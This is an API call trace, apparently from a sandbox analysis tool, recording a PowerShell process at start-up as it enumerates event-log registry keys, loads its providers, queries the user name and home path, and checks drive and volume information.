	[0211.394] RegQueryInfoKeyW (in: hKey=0x344, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x18cfac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18cfa8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x18cfac*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x18cfa8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.394] CoTaskMemFree (pv=0x0) 
	[0211.394] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0211.394] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x0, lpName=0x2189c0, lpcchName=0x18d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x18d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.394] CoTaskMemFree (pv=0x2189c0) 
	[0211.394] CoTaskMemFree (pv=0x0) 
	[0211.394] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0211.394] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x1, lpName=0x2189c0, lpcchName=0x18d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x18d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.394] CoTaskMemFree (pv=0x2189c0) 
	[0211.394] CoTaskMemFree (pv=0x0) 
	[0211.394] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0211.395] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x2, lpName=0x2189c0, lpcchName=0x18d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x18d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.395] CoTaskMemFree (pv=0x2189c0) 
	[0211.395] CoTaskMemFree (pv=0x0) 
	[0211.395] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0211.395] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x3, lpName=0x2189c0, lpcchName=0x18d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x18d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.395] CoTaskMemFree (pv=0x2189c0) 
	[0211.395] CoTaskMemFree (pv=0x0) 
	[0211.395] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0211.395] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x4, lpName=0x2189c0, lpcchName=0x18d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x18d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.395] CoTaskMemFree (pv=0x2189c0) 
	[0211.395] CoTaskMemFree (pv=0x0) 
	[0211.395] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0211.395] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x5, lpName=0x2189c0, lpcchName=0x18d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x18d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.395] CoTaskMemFree (pv=0x2189c0) 
	[0211.395] CoTaskMemFree (pv=0x0) 
	[0211.395] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0211.395] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x6, lpName=0x2189c0, lpcchName=0x18d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x18d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.395] CoTaskMemFree (pv=0x2189c0) 
	[0211.395] CoTaskMemFree (pv=0x0) 
	[0211.395] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0211.395] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x7, lpName=0x2189c0, lpcchName=0x18d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x18d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.395] CoTaskMemFree (pv=0x2189c0) 
	[0211.395] CoTaskMemFree (pv=0x0) 
	[0211.395] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0211.395] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x8, lpName=0x2189c0, lpcchName=0x18d038, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x18d038, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0211.395] CoTaskMemFree (pv=0x2189c0) 
	[0211.395] CoTaskMemFree (pv=0x0) 
	[0211.395] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d098 | out: phkResult=0x18d098*=0x348) returned 0x0
	[0211.395] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d098 | out: phkResult=0x18d098*=0x0) returned 0x2
	[0211.396] RegOpenKeyExW (in: hKey=0x344, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d098 | out: phkResult=0x18d098*=0x34c) returned 0x0
	[0211.396] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d098 | out: phkResult=0x18d098*=0x0) returned 0x2
	[0211.396] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d098 | out: phkResult=0x18d098*=0x350) returned 0x0
	[0211.396] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d098 | out: phkResult=0x18d098*=0x0) returned 0x2
	[0211.396] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d098 | out: phkResult=0x18d098*=0x354) returned 0x0
	[0211.396] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d098 | out: phkResult=0x18d098*=0x0) returned 0x2
	[0211.396] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d098 | out: phkResult=0x18d098*=0x358) returned 0x0
	[0211.396] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d098 | out: phkResult=0x18d098*=0x0) returned 0x2
	[0211.396] RegOpenKeyExW (in: hKey=0x344, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d098 | out: phkResult=0x18d098*=0x35c) returned 0x0
	[0211.396] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d098 | out: phkResult=0x18d098*=0x0) returned 0x2
	[0211.396] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d098 | out: phkResult=0x18d098*=0x0) returned 0x5
	[0212.052] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1ba10008
	[0212.864] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f615f8*="WSMan", lpRawData=0x2f61368) returned 1
	[0212.872] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0212.872] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0212.877] CoTaskMemAlloc (cb=0x804) returned 0x1b923140
	[0212.877] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b923140, nSize=0x18d2f8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x18d2f8) returned 0x1
	[0212.878] CoTaskMemFree (pv=0x1b923140) 
	[0212.878] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0212.878] GetUserNameW (in: lpBuffer=0x2189c0, pcbBuffer=0x18d338 | out: lpBuffer="aETAdzjz", pcbBuffer=0x18d338) returned 1
	[0212.878] CoTaskMemFree (pv=0x2189c0) 
	[0212.878] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f66f88*="Alias", lpRawData=0x2f66d18) returned 1
	[0212.917] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0212.917] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0212.917] CoTaskMemFree (pv=0x235590) 
	[0212.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.919] CoTaskMemAlloc (cb=0x804) returned 0x1b923140
	[0212.919] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b923140, nSize=0x18d2f8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x18d2f8) returned 0x1
	[0212.919] CoTaskMemFree (pv=0x1b923140) 
	[0212.919] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0212.919] GetUserNameW (in: lpBuffer=0x2189c0, pcbBuffer=0x18d338 | out: lpBuffer="aETAdzjz", pcbBuffer=0x18d338) returned 1
	[0212.919] CoTaskMemFree (pv=0x2189c0) 
	[0212.920] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f6c530*="Environment", lpRawData=0x2f6c2c0) returned 1
	[0212.933] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0212.933] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0212.933] CoTaskMemFree (pv=0x235590) 
	[0212.934] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0212.934] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0212.934] CoTaskMemFree (pv=0x235590) 
	[0212.934] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0212.934] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0212.934] CoTaskMemFree (pv=0x235590) 
	[0212.934] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x18cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0212.934] SetErrorMode (uMode=0x1) returned 0x1
	[0212.935] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x18d0b0 | out: lpFileInformation=0x18d0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.935] SetErrorMode (uMode=0x1) returned 0x1
	[0212.936] GetLogicalDrives () returned 0x4
	[0212.936] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18cc10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.937] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0212.937] SetErrorMode (uMode=0x1) returned 0x1
	[0212.938] CoTaskMemAlloc (cb=0x68) returned 0x1b916890
	[0212.938] CoTaskMemAlloc (cb=0x68) returned 0x1b916900
	[0212.938] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b916890, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x18d080, lpMaximumComponentLength=0x18d07c, lpFileSystemFlags=0x18d078, lpFileSystemNameBuffer=0x1b916900, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x18d080*=0x705ba84c, lpMaximumComponentLength=0x18d07c*=0xff, lpFileSystemFlags=0x18d078*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0212.938] CoTaskMemFree (pv=0x1b916890) 
	[0212.938] CoTaskMemFree (pv=0x1b916900) 
	[0212.938] SetErrorMode (uMode=0x1) returned 0x1
	[0212.938] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0212.940] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.940] SetErrorMode (uMode=0x1) returned 0x1
	[0212.940] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18d020 | out: lpFileInformation=0x18d020*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.940] SetErrorMode (uMode=0x1) returned 0x1
	[0212.940] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.940] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18cc70, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.940] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0212.940] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x18cba0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.940] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0212.941] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.941] SetErrorMode (uMode=0x1) returned 0x1
	[0212.942] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18ce50 | out: lpFileInformation=0x18ce50*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.942] SetErrorMode (uMode=0x1) returned 0x1
	[0212.942] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.942] SetErrorMode (uMode=0x1) returned 0x1
	[0212.942] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18ce50 | out: lpFileInformation=0x18ce50*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.942] SetErrorMode (uMode=0x1) returned 0x1
	[0212.942] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x18cc90, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0212.942] SetErrorMode (uMode=0x1) returned 0x1
	[0212.942] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x18cef0 | out: lpFileInformation=0x18cef0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0212.942] SetErrorMode (uMode=0x1) returned 0x1
	[0212.943] CoTaskMemAlloc (cb=0x804) returned 0x1b923140
	[0212.943] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b923140, nSize=0x18d2f8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x18d2f8) returned 0x1
	[0212.943] CoTaskMemFree (pv=0x1b923140) 
	[0212.943] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0212.943] GetUserNameW (in: lpBuffer=0x2189c0, pcbBuffer=0x18d338 | out: lpBuffer="aETAdzjz", pcbBuffer=0x18d338) returned 1
	[0212.943] CoTaskMemFree (pv=0x2189c0) 
	[0212.943] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f73588*="FileSystem", lpRawData=0x2f73318) returned 1
	[0212.979] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0212.979] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0212.979] CoTaskMemFree (pv=0x235590) 
	[0212.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0212.981] CoTaskMemAlloc (cb=0x804) returned 0x1b923140
	[0212.981] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b923140, nSize=0x18d2f8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x18d2f8) returned 0x1
	[0212.981] CoTaskMemFree (pv=0x1b923140) 
	[0212.981] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0212.981] GetUserNameW (in: lpBuffer=0x2189c0, pcbBuffer=0x18d338 | out: lpBuffer="aETAdzjz", pcbBuffer=0x18d338) returned 1
	[0212.981] CoTaskMemFree (pv=0x2189c0) 
	[0212.982] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f78d78*="Function", lpRawData=0x2f78b08) returned 1
	[0213.000] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0213.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0213.000] CoTaskMemFree (pv=0x235590) 
	[0219.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.110] CoTaskMemAlloc (cb=0x804) returned 0x1b923140
	[0219.110] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b923140, nSize=0x18d2f8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x18d2f8) returned 0x1
	[0219.110] CoTaskMemFree (pv=0x1b923140) 
	[0219.110] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0219.110] GetUserNameW (in: lpBuffer=0x2189c0, pcbBuffer=0x18d338 | out: lpBuffer="aETAdzjz", pcbBuffer=0x18d338) returned 1
	[0219.111] CoTaskMemFree (pv=0x2189c0) 
	[0219.111] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2faafb8*="Registry", lpRawData=0x2faad48) returned 1
	[0219.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.558] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.559] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.559] CoTaskMemAlloc (cb=0x804) returned 0x1b923140
	[0219.559] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b923140, nSize=0x18d2f8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x18d2f8) returned 0x1
	[0219.559] CoTaskMemFree (pv=0x1b923140) 
	[0219.559] CoTaskMemAlloc (cb=0x204) returned 0x2189c0
	[0219.559] GetUserNameW (in: lpBuffer=0x2189c0, pcbBuffer=0x18d338 | out: lpBuffer="aETAdzjz", pcbBuffer=0x18d338) returned 1
	[0219.560] CoTaskMemFree (pv=0x2189c0) 
	[0219.560] ReportEventW (hEventLog=0x1ba10008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fb0380*="Variable", lpRawData=0x2fb0110) returned 1
	[0219.573] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0219.573] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.573] CoTaskMemFree (pv=0x235590) 
	[0219.575] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0219.575] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.575] CoTaskMemFree (pv=0x235590) 
	[0219.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0219.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0219.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x18caf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
